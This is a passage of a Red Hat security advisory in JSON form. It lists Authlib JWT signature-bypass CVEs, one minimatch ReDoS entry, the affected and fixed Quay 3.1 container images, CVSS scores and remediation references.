"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:6e13793ca8f309ec0b69ae609b840ff0f41989d88cd4bba127e1b0040631367e_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:c0d00643c4ac6f84e5327192a29c6353b5dcac34d483d0a3e5f39d366127fcc2_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:f6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "minimatch: Minimatch: Denial of Service via catastrophic backtracking in glob expressions"
},
{
"cve": "CVE-2026-27962",
"cwe": {
"id": "CWE-347",
"name": "Improper Verification of Cryptographic Signature"
},
"discovery_date": "2026-03-16T18:02:07.041902+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:733de3a7351b69265aee8d12c7fe65f60e099c923510758a75c8800409126c41_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:caa20d6002cfd42dc4ab86dee5dde07da0a7e1dcc310c9be33bf28a2df1ef82b_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:d59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:3fb6c2af69237c3ff2cd326bc655028392a2d11c9162b85a9c4a762cbe7d044b_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:4d88d159b8a0e46a8508735f555179c6b08caef62d42e5fb676fdac10e333f58_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:fe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:5558d6af86f65a79c88f1ffe290b49219d0f00c93ec8a03f0e81d0e9e13501fc_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:9e96b505901615f671d5b99094bda544ecbce32a3772125f2baf5f0ea67d5687_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:ba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6bf4ab153aa99b67b1e3fe0cbf0fa3e3694d3394c957fc03a5578d03cb2e88bc_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:720000552d67523e437f0638abf185ae32040f1437225fc461be499490494ce7_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:edd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-bundle@sha256:e165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0731cf4122bec0cef7c4f05ee19fe43871d977515c91e0decce981abeab85af6_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0c8ad49237e784b6bcaf48c62928533a231026b1605926edee0313d3a83c10c4_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:de004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2448164"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Authlib, a Python library used for creating secure authentication and authorization systems. This vulnerability, known as JWK (JSON Web Key) Header Injection, affects how Authlib verifies digital signatures in JWS (JSON Web Signature) tokens. An attacker can exploit this by creating a specially crafted token that includes their own cryptographic key in the header. When the system attempts to verify this token without a predefined key, it mistakenly uses the attacker\u0027s key, allowing them to bypass authentication and gain unauthorized access.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "authlib: Authlib: Authentication bypass due to JWK Header Injection vulnerability",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This critical vulnerability in Authlib\u0027s JWS implementation allows unauthenticated attackers to forge JWTs by embedding their own cryptographic key in the token header. Impact is high to confidentiality and integrity as attackers can bypass authentication.\n\nThe impact for Red Hat Quay is rated as low because it imports authlib solely as a JWK parsing utility and performs all JWT signature verification through PyJWT, so the vulnerable jws.deserialize_compact() code path is never called.\n\nRed Hat OpenShift AI is not affected, since authlib is only present as a transitive dependency in the dev dependency group and is not included in production image builds, so the vulnerable code is not present in the shipped product.\n\nRed Hat Satellite is not affected, as authlib is only present as a dependency of fastmcp. In Satellite, fastmcp only invokes authlib using jwt.decode() which isn\u0027t able to reach the vulnerability condition even with key=none.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:6e13793ca8f309ec0b69ae609b840ff0f41989d88cd4bba127e1b0040631367e_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:c0d00643c4ac6f84e5327192a29c6353b5dcac34d483d0a3e5f39d366127fcc2_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:f6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a_s390x"
],
"known_not_affected": [
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:733de3a7351b69265aee8d12c7fe65f60e099c923510758a75c8800409126c41_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:caa20d6002cfd42dc4ab86dee5dde07da0a7e1dcc310c9be33bf28a2df1ef82b_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:d59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:3fb6c2af69237c3ff2cd326bc655028392a2d11c9162b85a9c4a762cbe7d044b_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:4d88d159b8a0e46a8508735f555179c6b08caef62d42e5fb676fdac10e333f58_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:fe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:5558d6af86f65a79c88f1ffe290b49219d0f00c93ec8a03f0e81d0e9e13501fc_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:9e96b505901615f671d5b99094bda544ecbce32a3772125f2baf5f0ea67d5687_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:ba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6bf4ab153aa99b67b1e3fe0cbf0fa3e3694d3394c957fc03a5578d03cb2e88bc_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:720000552d67523e437f0638abf185ae32040f1437225fc461be499490494ce7_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:edd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-bundle@sha256:e165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0731cf4122bec0cef7c4f05ee19fe43871d977515c91e0decce981abeab85af6_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0c8ad49237e784b6bcaf48c62928533a231026b1605926edee0313d3a83c10c4_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:de004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-27962"
},
{
"category": "external",
"summary": "RHBZ#2448164",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2448164"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-27962",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-27962"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-27962",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27962"
},
{
"category": "external",
"summary": "https://github.com/authlib/authlib/commit/a5d4b2d4c9e46bfa11c82f85fdc2bcc0b50ae681",
"url": "https://github.com/authlib/authlib/commit/a5d4b2d4c9e46bfa11c82f85fdc2bcc0b50ae681"
},
{
"category": "external",
"summary": "https://github.com/authlib/authlib/releases/tag/v1.6.9",
"url": "https://github.com/authlib/authlib/releases/tag/v1.6.9"
},
{
"category": "external",
"summary": "https://github.com/authlib/authlib/security/advisories/GHSA-wvwj-cvrp-7pv5",
"url": "https://github.com/authlib/authlib/security/advisories/GHSA-wvwj-cvrp-7pv5"
}
],
"release_date": "2026-03-16T17:34:38.946000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-24T18:02:58+00:00",
"details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:6e13793ca8f309ec0b69ae609b840ff0f41989d88cd4bba127e1b0040631367e_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:c0d00643c4ac6f84e5327192a29c6353b5dcac34d483d0a3e5f39d366127fcc2_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:f6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:5665"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 9.1,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:733de3a7351b69265aee8d12c7fe65f60e099c923510758a75c8800409126c41_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:caa20d6002cfd42dc4ab86dee5dde07da0a7e1dcc310c9be33bf28a2df1ef82b_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:d59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:3fb6c2af69237c3ff2cd326bc655028392a2d11c9162b85a9c4a762cbe7d044b_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:4d88d159b8a0e46a8508735f555179c6b08caef62d42e5fb676fdac10e333f58_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:fe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:5558d6af86f65a79c88f1ffe290b49219d0f00c93ec8a03f0e81d0e9e13501fc_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:9e96b505901615f671d5b99094bda544ecbce32a3772125f2baf5f0ea67d5687_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:ba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6bf4ab153aa99b67b1e3fe0cbf0fa3e3694d3394c957fc03a5578d03cb2e88bc_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:720000552d67523e437f0638abf185ae32040f1437225fc461be499490494ce7_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:edd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-bundle@sha256:e165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0731cf4122bec0cef7c4f05ee19fe43871d977515c91e0decce981abeab85af6_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0c8ad49237e784b6bcaf48c62928533a231026b1605926edee0313d3a83c10c4_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:de004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:6e13793ca8f309ec0b69ae609b840ff0f41989d88cd4bba127e1b0040631367e_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:c0d00643c4ac6f84e5327192a29c6353b5dcac34d483d0a3e5f39d366127fcc2_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:f6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Low"
}
],
"title": "authlib: Authlib: Authentication bypass due to JWK Header Injection vulnerability"
},
{
"cve": "CVE-2026-28802",
"cwe": {
"id": "CWE-347",
"name": "Improper Verification of Cryptographic Signature"
},
"discovery_date": "2026-03-06T07:01:49.366979+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:733de3a7351b69265aee8d12c7fe65f60e099c923510758a75c8800409126c41_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:caa20d6002cfd42dc4ab86dee5dde07da0a7e1dcc310c9be33bf28a2df1ef82b_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:d59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:3fb6c2af69237c3ff2cd326bc655028392a2d11c9162b85a9c4a762cbe7d044b_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:4d88d159b8a0e46a8508735f555179c6b08caef62d42e5fb676fdac10e333f58_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:fe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:5558d6af86f65a79c88f1ffe290b49219d0f00c93ec8a03f0e81d0e9e13501fc_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:9e96b505901615f671d5b99094bda544ecbce32a3772125f2baf5f0ea67d5687_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:ba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6bf4ab153aa99b67b1e3fe0cbf0fa3e3694d3394c957fc03a5578d03cb2e88bc_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:720000552d67523e437f0638abf185ae32040f1437225fc461be499490494ce7_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:edd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-bundle@sha256:e165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0731cf4122bec0cef7c4f05ee19fe43871d977515c91e0decce981abeab85af6_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0c8ad49237e784b6bcaf48c62928533a231026b1605926edee0313d3a83c10c4_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:de004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2445120"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Authlib, a Python library for building OAuth and OpenID Connect servers. A remote attacker can exploit this vulnerability by crafting a malicious JSON Web Token (JWT) with a \"none\" algorithm and an empty signature. This bypasses the expected signature verification, potentially allowing the attacker to forge tokens and gain unauthorized access or perform unauthorized actions within applications using Authlib.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "authlib: Authlib: Signature verification bypass via malicious JWT allows unauthorized access",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:6e13793ca8f309ec0b69ae609b840ff0f41989d88cd4bba127e1b0040631367e_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:c0d00643c4ac6f84e5327192a29c6353b5dcac34d483d0a3e5f39d366127fcc2_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:f6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a_s390x"
],
"known_not_affected": [
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:733de3a7351b69265aee8d12c7fe65f60e099c923510758a75c8800409126c41_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:caa20d6002cfd42dc4ab86dee5dde07da0a7e1dcc310c9be33bf28a2df1ef82b_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:d59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:3fb6c2af69237c3ff2cd326bc655028392a2d11c9162b85a9c4a762cbe7d044b_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:4d88d159b8a0e46a8508735f555179c6b08caef62d42e5fb676fdac10e333f58_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:fe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:5558d6af86f65a79c88f1ffe290b49219d0f00c93ec8a03f0e81d0e9e13501fc_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:9e96b505901615f671d5b99094bda544ecbce32a3772125f2baf5f0ea67d5687_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:ba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6bf4ab153aa99b67b1e3fe0cbf0fa3e3694d3394c957fc03a5578d03cb2e88bc_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:720000552d67523e437f0638abf185ae32040f1437225fc461be499490494ce7_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:edd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-bundle@sha256:e165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0731cf4122bec0cef7c4f05ee19fe43871d977515c91e0decce981abeab85af6_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0c8ad49237e784b6bcaf48c62928533a231026b1605926edee0313d3a83c10c4_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:de004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-28802"
},
{
"category": "external",
"summary": "RHBZ#2445120",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2445120"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-28802",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-28802"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-28802",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-28802"
},
{
"category": "external",
"summary": "https://github.com/authlib/authlib/commit/a61c2acb807496e67f32051b5f1b1d5ccf8f0a75",
"url": "https://github.com/authlib/authlib/commit/a61c2acb807496e67f32051b5f1b1d5ccf8f0a75"
},
{
"category": "external",
"summary": "https://github.com/authlib/authlib/commit/b87c32ed07b8ae7f805873e1c9cafd1016761df7",
"url": "https://github.com/authlib/authlib/commit/b87c32ed07b8ae7f805873e1c9cafd1016761df7"
},
{
"category": "external",
"summary": "https://github.com/authlib/authlib/security/advisories/GHSA-7wc2-qxgw-g8gg",
"url": "https://github.com/authlib/authlib/security/advisories/GHSA-7wc2-qxgw-g8gg"
}
],
"release_date": "2026-03-06T06:44:26.402000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-24T18:02:58+00:00",
"details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:6e13793ca8f309ec0b69ae609b840ff0f41989d88cd4bba127e1b0040631367e_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:c0d00643c4ac6f84e5327192a29c6353b5dcac34d483d0a3e5f39d366127fcc2_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:f6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:5665"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability.",
"product_ids": [
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:733de3a7351b69265aee8d12c7fe65f60e099c923510758a75c8800409126c41_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:caa20d6002cfd42dc4ab86dee5dde07da0a7e1dcc310c9be33bf28a2df1ef82b_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:d59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:3fb6c2af69237c3ff2cd326bc655028392a2d11c9162b85a9c4a762cbe7d044b_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:4d88d159b8a0e46a8508735f555179c6b08caef62d42e5fb676fdac10e333f58_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:fe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:5558d6af86f65a79c88f1ffe290b49219d0f00c93ec8a03f0e81d0e9e13501fc_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:9e96b505901615f671d5b99094bda544ecbce32a3772125f2baf5f0ea67d5687_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:ba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6bf4ab153aa99b67b1e3fe0cbf0fa3e3694d3394c957fc03a5578d03cb2e88bc_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:720000552d67523e437f0638abf185ae32040f1437225fc461be499490494ce7_ppc64le",
